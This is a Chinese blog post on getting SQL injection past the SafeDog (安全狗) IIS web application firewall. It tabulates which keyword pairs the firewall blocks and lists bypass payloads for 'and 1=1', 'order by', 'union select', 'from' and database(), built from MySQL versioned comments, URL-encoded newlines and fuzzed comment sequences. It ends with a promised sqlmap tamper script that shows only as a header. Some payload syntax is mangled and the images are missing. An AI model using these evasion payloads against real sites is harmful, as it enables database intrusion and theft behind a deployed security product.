bypass安全狗
安全狗防护基本方法
本次使用的安全狗版本为:V4.0 27338 IIS 正式版,是官网截止2019年10月8号的最新版本,本篇文章主要介绍sql注入突破。
sql注入防护
在安全狗的默认防护规则中有一系列关于sql注入的防护

当初发这些规则时就会被拦截,例如:

bypass Sql注入防护
绕过总结(图片来自网上)

绕过 and 1=1
直接使用
and -1=-1绕过![image]()
使用注释绕过,50000表示mysql的大版本号为5.0版本
或者:


使用减法或加法绕过,注意加号需要进行url编码
![image]()
![image]()
使用
&&代替and,使用true代替1=1![image]()
其它绕过说明只有and和
1=1在一起时安全狗才会拦截,那就需要干扰安全狗将and和1=1使用一系列注释和特殊字符分开,例如:_**/!and////!/!1=1/**_payload 结果 and 未拦截 1=1 未拦截 and 1=1 拦截 ![image]()
绕过order by
| payload | 结果 |
|---|---|
| order | 未拦截 |
| by | 未拦截 |
| order by | 拦截 |
说明只有order和by在一起时安全狗才会拦截。
使用
.绕过![image]()
使用
%23%0a绕过![image]()
fuzz出来的其它绕过方式,有很多,这里只举其中的5中方式
/!order /!///by/1,2,3,4/!order //%//by/1,2,3,4/!order ////by/1,2,3,4/!order /!/////by/1,2,3,4/!order /!//////by/1,2,3,4
绕过union select
| payload | 结果 |
|---|---|
| union | 未拦截 |
| select | 未拦截 |
| union select | 拦截 |
说明只有union和select在一起时安全狗才会拦截。
安全狗对
union select的过滤比较严,我只找到了一种绕过方法。
使用
--+aaaaaa%0a绕过![image]()
绕过select from
| payload | 结果 |
|---|---|
| select | 未拦截 |
| from | 未拦截 |
| select from | 未拦截 |
| select 1 | 未拦截 |
| from 1 | 拦截 |
| from1 | 未拦截 |
说明from后面有空格时会拦截。
使用
-+即可绕过(仅适用于from后面跟数字的情况):![image]()
使用_
/!99999c//!99999c/FROM_绕过![image]()
绕过database()
使用注释即可绕过:

sqlmap tamper
最后赠送过狗tamper
_#!/usr/bin/env python |
参考文章
评论
评论插件加载失败
正在加载评论插件









